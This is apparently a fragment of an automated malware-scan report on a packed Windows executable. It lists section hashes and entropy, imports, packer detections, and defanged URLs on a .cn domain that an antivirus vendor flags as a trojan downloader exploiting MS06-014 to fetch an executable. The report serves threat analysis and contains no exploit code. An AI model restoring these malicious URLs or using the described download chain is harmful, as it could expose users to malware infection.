    (no name) 0x6000  0x1000  0x0     0.00 d41d8cd98f00b204e9800998ecf8427e
    (no name) 0x7000  0x1000  0x200   0.20 467f29e48f3451df774e13adae5aafc2
    (no name) 0x8000  0x1000  0x0     0.00 d41d8cd98f00b204e9800998ecf8427e
    .rsrc     0x9000  0xaa000 0x60c00 8.00 6131b07e586d38ed0f7dbcf304a003fc
    (no name) 0xb3000 0x1000  0x200   7.54 7b2c4b8eca4448745248eb4681bc781d
    .data     0xb4000 0x44000 0x43e00 7.92 cc009e690231875ddd0d207c233b0c43
    .adata    0xf8000 0x1000  0x0     0.00 d41d8cd98f00b204e9800998ecf8427e
  5 imports:
    kernel32.dll: GetProcAddress, GetModuleHandleA, LoadLibraryA
    advapi32.dll: GetUserNameA
    shell32.dll: ShellExecuteA
    oleaut32.dll: VariantChangeTypeEx
    kernel32.dll: RaiseException
  0 exports
packers (Kaspersky): PE_Patch
packers (F-Prot): Aspack
#1.36 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/hy.htm (Kaspersky already detects it as: Trojan program Trojan-Downloader.VBS.Psyme.fd)
Exploits the MS06-014 vulnerability to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.36.1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/huoyan.htm
/---
File does not exist
---/
#1.36.2 hxxp://www.*es**8**6.com/pic/ddb/2006692151148920.gif
/---
File does not exist
---/